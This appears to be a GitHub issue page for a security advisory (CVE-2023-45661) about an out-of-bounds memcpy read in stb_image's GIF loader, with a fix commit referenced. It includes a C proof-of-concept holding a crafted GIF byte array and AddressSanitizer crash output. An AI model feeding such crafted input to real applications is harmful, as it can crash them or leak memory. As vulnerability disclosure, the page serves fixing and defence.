We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
GHSL-2023-145/CVE-2023-45661
A crafted image file may trigger out of bounds memcpy read in stbi__gif_load_next. This happens because two_back points to a memory address lower than the start of the buffer out.
memcpy
stbi__gif_load_next
two_back
out
This issue may be used to leak internal memory allocation information.
To reproduce the issue:
#include <stdint.h> #define STB_IMAGE_IMPLEMENTATION #include "../stb_image.h" int main(int argc, char* argv[]) { const uint8_t data[] = {0x47,0x49,0x46,0x38,0x39,0x61,0xbd,0x00,0xdf,0x79,0xa9,0x97,0x53, 0x43,0x05,0xff,0xbe,0x21,0x00,0x30,0x03,0x01,0x00,0x21,0x00,0x2c, 0x00,0x00,0x00,0x00,0xbd,0x00,0x3f,0x71,0x07,0x00,0x05,0xff,0xbe, 0x01,0x00,0x68,0x00,0x21,0xf9,0x04,0x2c,0x0a,0x00,0x1f,0x00,0x2c, 0x00,0x00,0x00,0x00,0xbd,0x00,0x71,0x00,0x00,0x05,0xff,0xe0,0x27, 0x8e,0x64,0x68}; size_t size = sizeof(data); int x, y, z, channels; stbi_uc *img = stbi_load_gif_from_memory(data, size, NULL, &x, &y, &z, &channels, 4); stbi_image_free(img); return 0; }
AddressSanitizer:DEADLYSIGNAL ================================================================= ==34019==ERROR: AddressSanitizer: SEGV on unknown address 0x7efdf91e0ae8 (pc 0x7efe05a0ac23 bp 0x7ffd4ee08700 sp 0x7ffd4ee07ec8 T0) ==34019==The signal is caused by a READ memory access. #2 0x4e4156 in stbi__gif_load_next(stbi__context*, stbi__gif*, int*, int, unsigned char*) tests/../stb_image.h:6817:16 #3 0x4dee75 in stbi__load_gif_main(stbi__context*, int**, int*, int*, int*, int*, int) tests/../stb_image.h:6983:14 #4 0x4de8bd in stbi_load_gif_from_memory tests/../stb_image.h:1448:30
The text was updated successfully, but these errors were encountered:
Fix wild address read in stbi__gif_load_next
8cfcbf7
It seems `layers` were forgotten to include in equation. Fixes nothings#1538
No branches or pull requests
A crafted image file may trigger out of bounds
memcpy
read instbi__gif_load_next
. This happens becausetwo_back
points to a memory address lower than the start of the bufferout
.Impact
This issue may be used to leak internal memory allocation information.
Resources
To reproduce the issue:
The text was updated successfully, but these errors were encountered: